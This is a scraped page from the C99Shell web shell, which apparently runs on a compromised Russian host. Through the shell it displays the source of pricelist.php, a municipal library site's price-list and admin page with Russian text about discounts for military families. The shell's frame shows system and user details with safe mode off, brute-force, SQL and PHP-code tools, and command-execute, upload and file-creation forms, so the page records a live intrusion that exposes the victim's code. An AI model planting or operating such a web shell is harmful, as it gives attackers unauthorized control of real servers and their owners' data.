!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache/2.4.68 (Linux) PHP/7.4.33. PHP/7.4.33 

uname -a: Linux bjb2293782.nichost.ru 6.6.151-1.el8.x86_64 #1 SMP PREEMPT_DYNAMIC Mon Aug 10
11:16:02 MSK 2026 x86_64
 

uid=12584(bjb2293782) gid=12584(bjb2293782) groups=12584(bjb2293782)  

Safe-mode: OFF (not secure)

/home/bjb2293782/xn--80abaeoqbbrbgf8aea5a2a2z.xn--p1ai/docs/   drwxr-x---
Free 2715.77 GB of 4607.12 GB (58.95%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     pricelist.php (27.55 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
require("design.php");
//require_once("opac.php");
session_start();

if (isset(
$_POST['action']))
{
    if (!
AdminAuth(RIGHT_SUPER_ADMIN)) die("ERROR: Доступ закрыт");

    if (
$_POST['action'] == "set")
    {
        
$id intval(_POST_('id'));
        
$name _POST_('name');
        
$unit _POST_('unit');
        
$number intval(_POST_('number'));
        
$price floatval(_POST_('price'));
        
$online intval(_POST_('online'));

        
$mysql mysqlopen();

        
$name mysqli_escape_string($mysql$name);
        
$unit mysqli_escape_string($mysql$unit);


        if (
$id==-1)
        {
            
mysqli_query($mysql"INSERT INTO libPriceList (`name`,`unit`,`price`,`number`,`online`) VALUES ('$name','$unit',$price,$number,$online)");
            if (
mysqli_errno($mysql)) die("ERROR: ".mysqli_error($mysql)." at line ".__LINE__." of file ".__FILE__."\n");
        }
        else
        {
            
mysqli_query($mysql"UPDATE libPriceList SET `name`='$name',`unit`='$unit',`price`=$price,`number`=$number WHERE `id`=$id LIMIT 1");
            if (
mysqli_errno($mysql)) die("ERROR: ".mysqli_error($mysql)." at line ".__LINE__." of file ".__FILE__."\n");
        }

        die(
"OK");
    }

    if (
$_POST['action'] == "del")
    {
        
$id intval(_POST_('id'));

        
$mysql mysqlopen();
        
mysqli_query($mysql"DELETE FROM libPriceList WHERE `id`=$id LIMIT 1");
        if (
mysqli_errno($mysql)) die("ERROR: ".mysqli_error($mysql)." at line ".__LINE__." of file ".__FILE__."\n");
        die(
"OK");
    }


    die(
"ERROR: Неизвестный запрос");
}


TOP(1);


$mysql mysqlopen();



LEFTCOLUMN();
CHANNELS();


MAINCOLUMN();

$canEdit AdminAuth(RIGHT_SUPER_ADMIN);

?>
<div class=path>
    <nobr><img src='c.png'><a href='readers.php'>Читателям</a></nobr>
    <nobr><img src='g.png'><b>Платные услуги</b></nobr>
</div>


<?php
if (AdminAuth())
{
?>
    <script>
    function manualBillForm()
    {
        var dlg = openDialogBoxWithButtons("Выписать счет вручную", 800, 100);
        grid = createPropertyGrid(dlg.innerElement);

        var descEdit = createEditProperty(grid, "Название услуги:", "100%",'');

        var priceEditor = createEditProperty(grid, "Стоимость:", 80, 500);
        priceEditor.editor.parentNode.appendChild(document.createElement('SPAN')).innerHTML = "руб.";
        priceEditor.type="number";
        priceEditor.minValue = 0.0;
        priceEditor.maxValue = 100000.0;
        priceEditor.step = 10.0;

    
        var btn = dlg.buttonPanel.appendChild(createInput('button'));
        btn.value = "OK";
        btn.onclick=function()
        {
            var post = "action=shop:manual";
            post+='&desc='+encodeURIComponent(descEdit.getValue());
            post+='&price='+encodeURIComponent(priceEditor.getValue());

            var btn = this;
            btn.disabled=true;

            sendXHR('api.php',post,
                function(response)
                {
                    console.log(response);
                    cartItemCount = parseInt(response);
                    buyAnim(btn);
                    dlg.close();
                },
                function(error)
                {
                    btn.disabled=false;
                    errorBox(error);
                });    
        };
    

        btn = dlg.buttonPanel.appendChild(createInput('button'));
        btn.value="Закрыть";
        btn.onclick = function()
        {
            dlg.close();
        };

        dlg.alignInScreenCenter();
        descEdit.editor.focus();
        
    }
    </script>




    <br>
    <center><input type=button class=dlgbtn value='Лица, оплатившие услуги online' onclick='location="payservicepeople.php"'></center>
    <br>
    <center><input type=button class=dlgbtn value='Выписать счет вручную' onclick='manualBillForm()'></center>

<?php
}
/*
?>

<h1>Прейскурант цен на дополнительные платные услуги, оказываемые Муниципальным бюджетным учреждением культуры городского округа Королев Московской области "Централизованная библиотечная система" посредством безналичной оплаты через официальный сайт МБУК ЦБС</h1>

<center>
<table width=100% cellspacing=0 cellpadding=8 border=1 bordercolor=#cccccc>
<tr>
    <th width=1% nowrap>№</th>
    <th width=55%>Наименование услуги</th>
    <th width=20%>Единица<br>измерения</th>
    <th width=5%>Стоимость, руб</th>
    <?php
    if ($canEdit)
    {
        print "<th width=1%>&nbsp;</th>";
    }
    ?>
    <td width=1%>&nbsp;</th>
</tr>

<?php
    $mysql = mysqlopen();

    $result = mysqli_query($mysql,"SELECT `id`,`number`,`name`,`unit`,`price` FROM libPriceList WHERE `online`=1 ORDER BY `number` ASC");
    if (mysqli_errno($mysql)) die("ERROR: ".mysqli_error($mysql)." at line ".__LINE__." of file ".__FILE__."\n");

    $n = 1;
    $maxN = 0;
    while($row = mysqli_fetch_assoc($result))
    {
        $id = $row['id'];

        if ($row['number'] > $maxN) $maxN = $row['number'];
        
        print "<tr>\n";
        print "<td>".$n."</td>\n"; $n++;
        print "<td>"._html_($row['name'])."</td>\n";
        print "<td align=center>"._html_($row['unit'])."</td>\n";

        $price = $row['price'];
        if ($price == 0) $price="Бесплатно";
        print "<td align=right nowrap>$price</td>\n";

        if ($canEdit)
        {
            print "<td nowrap>";
            print "<img src=edit.png class=editBtn2 title='Правка' onclick='editPrice({id:$id,number:".$row['number'].",name:\""._script_($row['name'])."\",unit:\""._script_($row['unit'])."\",price:".$row['price'].",online:1})'>";
            print "<img src=del32x32.png class=editBtn2 title='Удалить' onclick='delPrice($id)'>";
            print "</td>\n";
        }

        
        if ($price == 0) print "<td>&nbsp;</td>";
        else
        print "<td align=center><img class=editBtn2 src=buy.png width=24 height=24 title='Купить' onclick='doBuy(this,$id,2)'></td>";

        print "</tr>\n";
    }
    mysqli_free_result($result);

    $maxN++;
?>
</table>
<br>

<?php
*/
?>

<h1>Платные услуги</h1>

<?php
if (AdminAuth())
{
?>
    <br>
        <center><input type=button class=dlgBtn value='Правка платных услуг' onclick='doEditPayServices()'></center>
    <br>
    <script src='htmleditor.js?3'></script>
    <script>
        function doEditPayServices()
        {
            editHTML("Платные услуги","payservices.html", true);
        }
    </script>
<?php ?>

<?php require("payservices.html"); ?>



<br><br>





<h1>Прейскурант цен на дополнительные платные услуги, оказываемые учреждением культуры городского округа Королев Московской области "Централизованная библиотечная система"</h1>

<center>
<table width=100% cellspacing=0 cellpadding=8 border=1 bordercolor=#cccccc>
<tr>
    <th width=1% nowrap>№</th>
    <th width=55%>Наименование услуги</th>
    <th width=20%>Единица<br>измерения</th>
    <th width=5%>Стоимость, руб</th>
    <?php
    
if ($canEdit)
    {
        print 
"<th width=1%>&nbsp;</th>";
    }
    
?>
</tr>

<?php
    $mysql 
mysqlopen();

    
$result mysqli_query($mysql,"SELECT `id`,`number`,`name`,`unit`,`price` FROM libPriceList WHERE `online`=0 ORDER BY `number` ASC");
    if (
mysqli_errno($mysql)) die("ERROR: ".mysqli_error($mysql)." at line ".__LINE__." of file ".__FILE__."\n");

    
$n 1;
    
$maxN 0;
    while(
$row mysqli_fetch_assoc($result))
    {
        
$id $row['id'];

        if (
$row['number'] > $maxN$maxN $row['number'];
        
        print 
"<tr>\n";
        print 
"<td>".$n."</td>\n"$n++;
        print 
"<td>"._html_($row['name'])."</td>\n";
        print 
"<td align=center>"._html_($row['unit'])."</td>\n";

        
$price $row['price'];
        if (
$price == 0$price="Бесплатно";
        print 
"<td align=right nowrap>$price</td>\n";

        if (
$canEdit)
        {
            print 
"<td nowrap>";
            print 
"<img src=edit.png class=editBtn2 title='Правка' onclick='editPrice({id:$id,number:".$row['number'].",name:\""._script_($row['name'])."\",unit:\""._script_($row['unit'])."\",price:".$row['price'].",online:0})'>";
            print 
"<img src=del32x32.png class=editBtn2 title='Удалить' onclick='delPrice($id)'>";
            print 
"</td>\n";
        }

        print 
"</tr>\n";
    }
    
mysqli_free_result($result);

    
$maxN++;
?>
</table>
</center>
<br>

<?php
if ($canEdit)
{
?>
<center>[ <a href='#' onclick='newPrice(<?php print $maxN?>,0);return false'>Новая услуга</a> ]</center>



<script>
function editPrice(json)
{
    var dlg = openDialogBoxWithButtons('Правка платной услуги',700,200);

    var grid = createPropertyGrid(dlg.innerElement);

    var nameEditor = createEditProperty(grid, 'Название услуги:', "100%", json.name);
    var unitEditor = createEditProperty(grid, 'Ед.измерения:',"100%", json.unit);
    var priceEditor = createEditProperty(grid, "Цена (руб):", 150, json.price);
    priceEditor.editor.type="number";
    priceEditor.editor.min=0;
    priceEditor.editor.max=10000000;

    var numberEditor = createEditProperty(grid, "Порядок сортировки:",150,json.number);
    numberEditor.editor.type="number";

    var btn;
    btn = dlg.buttonPanel.appendChild(createInput('BUTTON'));
    btn.value="OK";
    btn.onclick = function()
        {
            var post = "action=set";
            post+='&id='+json.id;
            post+='&name='+encodeURIComponent(nameEditor.editor.value.trim());
            post+='&unit='+encodeURIComponent(unitEditor.editor.value.trim());
            post+='&price='+parseFloat(priceEditor.editor.value);
            post+='&number='+parseInt(numberEditor.editor.value);
            post+='&online='+json.online;

            var btn = this;
            btn.disabled=true;

            sendXHR('pricelist.php',post,
                function()
                {
                    location.reload();
                },
                function(error)
                {
                    btn.disabled=false;
                    errorBox(error);
                });    
        };

    btn = dlg.buttonPanel.appendChild(createInput('BUTTON'));
    btn.value="Закрыть";
    btn.onclick=function()
        {
            dlg.close();
        };
    nameEditor.editor.focus();
    dlg.alignInScreenCenter();        
}



function newPrice(maxN,online)
{
    editPrice({id:-1,number:maxN,name:'',unit:'',price:0,online:online});
}


function delPrice(id)
{
    yesNoDialog('Удалить данную услугу из прайс-листа?','Удаление',
        function()
        {
            sendXHR('pricelist.php','action=del&id='+id,
                function()
                {
                    location.reload();
                },
                function(error)
                {
                    errorBox(error);
                });
        });
}
</script>

<?php
}
?>

<br>

<p><b>1. Скидка 50% устанавливается для следующих категорий:</b></p>
<p>1.1. для детей из многодетных семей;</p>
<p>1.2. ветераны Великой Отечественной войны;</p>
<p>1.3. дети-сироты;</p>
<p>1.4. люди с ограниченными возможностями здоровья;</p>
<p>1.5. Членам семей:</p>
<p>1.5.1. граждан Российской Федерации, призванных в период с 21 сентября 2022 года Военным комиссариатом Московской области и призывными комиссиями по мобилизации граждан в Московской области на военную службу по мобилизации в Вооруженные Силы Российской Федерации в соответствии с Указом Президента Российской Федерации от 21.09.2022 № 647 «Об объявлении частичной мобилизации в Российской Федерации» (далее - Указ № 647); </p>
<p>1.5.2. граждан Российской Федерации, отобранных Военным комиссариатом Московской области и призывными комиссиями по мобилизации граждан в Московской области и заключивших в период с 21 сентября 2022 года по 31 декабря 2026 года включительно контракт о добровольном содействии в выполнении задач, возложенных на Вооруженные Силы Российской Федерации, с Министерством обороны Российской Федерации;</p>
<p>1.5.3. граждан Российской Федерации (иностранных граждан) старше 49 лет, поступивших на военную службу по контракту в Вооруженные Силы Российской Федерации через Военный комиссариат Московской области, пункты отбора на военную службу по контракту Московской области (далее - пункты отбора) и заключивших с Министерством обороны Российской Федерации контракт о прохождении военной службы на срок11 месяцев и более в период с 21 сентября 2022 года по 31 декабря 2026 года включительно;</p>
<p>1.5.4. граждан Российской Федерации (иностранных граждан) младше 49 лет, поступивших на военную службу по контракту в Вооруженные Силы Российской Федерации через Военный комиссариат Московской области, пункты отбора и заключивших с Министерством обороны Российской Федерации контракт о прохождении военной службы на срок 1 год и более в период с 21 сентября 2022 года по 31 декабря 2026 года включительно;</p>
<p>1.5.5. граждан Российской Федерации в возрасте от 18 до 30 лет, призванных на военную службу в соответствии с Федеральным законом от 28.03.1998 № 53-ФЗ «О воинской обязанности и военной службе» Военным комиссариатом Московской области, заключивших после 31 декабря 2023 года с Министерством обороны Российской Федерации контракт о прохождении военной службы на срок 1 год и более в период прохождения военной службы по призыву;</p>
<p>1.5.6. граждан, указанных в п. 1.5. настоящего приложения, заключивших после 31 декабря 2023 года с Министерством обороны Российской Федерации контракт о прохождении военной службы на срок 1 год и более; лиц без гражданства, поступившим на военную службу по контракту в Вооруженные Силы Российской Федерации в соответствии с Федеральным законом от 31.05.1996 № 61-ФЗ «Об обороне» через Военный комиссариат Московской области, пункты отбора и заключившим с Министерством обороны Российской Федерации контракт о прохождении военной службы на срок 1 год и более в период с 7 июля 2025 года по 31 декабря 2026 года включительно, в виде предоставления права льготного посещения платных мероприятий МБУК ЦБС.</p>
<p>1.6. Дополнительные меры социальной поддержки, установленные пунктом 1.5. настоящего приложения предоставляются детям из числа членов семьи участников специальной военной операции и детям из числа членов семьи погибших (умерших) участников специальной военной операции на основании заявления и сохраняются на период действия настоящего постановления.</p>
<p>1.7. Дополнительные меры социальной поддержки, установленные подпунктом 1.5.6. настоящего приложения, не предоставляются в случае, если граждане, указанные в пункте 1.5. настоящего приложения, уволены с военной службы ранее срока, установленного контрактом, по основанию, указанному в подпункте «в» пункта 5 Указа № 647 .</p>
<p>1.8. Члены семей граждан, указанных в пункте 1.5 настоящего приложения, уведомляют о наступлении обязательств, указанных в абзаце первом настоящего пункта, не позднее одного месяца со дня их наступления организацию, расположенную на территории городского округа Королев Московской области предоставляющую дополнительные меры социальной поддержки указанные в подпункте 1.5.7 пункта 1.5 настоящего приложения.</p>
<p>1.9. Меры социальной поддержки членам семей участников специальной военной операции, которые были направлены (привлечены) для участия в специальной военной операции Министерством обороны Российской Федерации предоставляются на основании сведений, полученных с использованием единой системы межведомственного электронного взаимодействия из Министерства обороны Российской Федерации, подтверждающих участие в специальной военной операции, либо на основании справки о подтверждении факта участия в специальной военной операции на территориях Украины, Донецкой Народной Республики, Луганской Народной Республики, Запорожской области и Херсонской области, выдаваемой участнику специальной военной операции (члену семьи участника специальной военной операции), по формам согласно приложениям 1,2 к постановлению Правительства Российской Федерации от 09.10.2024 № 1354 «О порядке установления факта участия граждан Российской Федерации в специальной военной операции на территориях Украины, Донецкой Народной Республики, Луганской Народной Республики, Запорожской области и Херсонской области».</p>
<p>1.10. Меры социальной поддержки членам семей участников специальной военной операции, которые были направлены (привлечены) для участия в специальной военной операции федеральными органами исполнительной власти, за исключением Министерства обороны Российской Федерации предоставляются на основании справки о подтверждении факта участия в специальной военной операции на территориях Украины, Донецкой Народной Республики, Луганской Народной Республики, Запорожской области и Херсонской области, выдаваемой участнику специальной военной операции (члену семьи участника специальной военной операции), по формам согласно приложениям 1, 2 к постановлению Правительства Российской Федерации от 09.10.2024 №1354 «О порядке установления факта участия граждан Российской Федерации в специальной военной операции на территориях Украины, Донецкой Народной Республики, Луганской Народной Республики, Запорожской области и Херсонской области.</p>
<p>1.11. Для целей настоящего приложения используются следующие понятия:</p>
<ul style='text-align:justify'>
    <li>Участник специальной военной операции - лицо, принимающее (принимавшее) участие в выполнении задач в ходе специальной военной операции на территориях, указанных в разделе III приложения к Федеральному закону от 12.01.1995 №5-ФЗ «О ветеранах»;</p>
    <li>члены семьи погибшего (умершего) участника специальной военной операции - родители, вдова (вдовец), не вступившая (не вступивший) в повторный брак, дети, в том числе усыновленные, не достигшие возраста 18 лет или старше этого возраста, если они стали инвалидами до достижения возраста 18 лет, а также дети до 23 лет, если дети обучаются по очной форме обучения по программам подготовки специалистов среднего звена в государственных профессиональных образовательных организациях Московской области и государственных образовательных организациях высшего образования Московской области; лицо, признанное фактически воспитывавшим и содержавшим участника специальной военной операции. Признание лица фактическим воспитателем производится судом в порядке особого судопроизводства по делам об установлении фактов, имеющих юридическое значение;</li>
    <li>члены семьи участника специальной военной операции - родители, супруга (супруг), дети (в том числе усыновленные) в возрасте до 18 лет или старше этого возраста, если они стали инвалидами до достижения возраста 18 лет, а так же дети до 23 лет, если дети обучаются по очной форме обучения по программам подготовки специалистов среднего звена в государственных профессиональных образовательных организациях Московской области и государственных образовательных организациях высшего образования Московской области.</li>
</ul>
<br>



<h2>В библиотеку по цифровому ID</h2>
<p>Минкультуры России информирует о новом порядке подтверждения льгот. Теперь для посещения мероприятий по льготному билету можно использовать цифровые документы в сервисе «Цифровой ID» национального мессенджера МАХ. Теперь подтвердить, что вы совершеннолетний, студент, многодетный родитель, участник СВО или член его семьи можно с помощью мессенджера.</p>
<p><b>Цифровой ID</b> — это специальный QR-код, который формируется на базе сведений из Госуслуг. Использовать его могут только граждане России старше 18 лет. Такой формат уже можно использовать при покупке билетов на культурные мероприятия.</p>
<p>Как это работает:</p>
<p>Посетитель показывает QR-код документа из раздела «Цифровой ID» в приложении МАХ. Проверка осуществляется через сервис «Госкан» в приложении «Госуслуги». Система подтвердит подлинность, не раскрывая персональные данные. Это удобно и безопасно. QR-код обновляется каждые 30 секунд, персональные данные не передаются третьим лицам, фото и QR защищены от скриншотов, все действия фиксируются системой Госуслуг.</p>
<p>Для создания QR кодов Цифрового ID гражданину необходимо:</p>
<ol>
    <li>Подтвердить учетную запись в ЕСИА.</li>
    <li>Установить мобильное приложение «Госуслуги» и национальный мессенджер МАХ.</li>
</ol>
<p>Создать цифровой ID в мессенджере МАХ.</p>
<p>Создание цифрового ID возможно следующими способами:</p>
<ol>
    <li>По существующей биометрии.</li>
    <li>По загранпаспорту нового образца.</li>
    <li>По водительским правам.</li>
</ol>
<p>Цифровой ID — это шаг к удобному и безопасному подтверждению льгот и документов.</p>



<br><br>
<hr>
<center><input type=button value='« Назад' onclick='history.back()'></center>
<br><br>


<?php

MIDDLECOLUMN2
();
print 
"<center><table><tr><td>";
ACTUALLINKS('actualLinksH');
print 
"</tr></td></table></center>";
FAQ();


MIDDLECOLUMN();
CHANNELS("channelBlockH");
RIGHTCOLUMN();

ACTUALLINKS();
FAQ();

?>




<?php BOTTOM(); ?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0052 ]--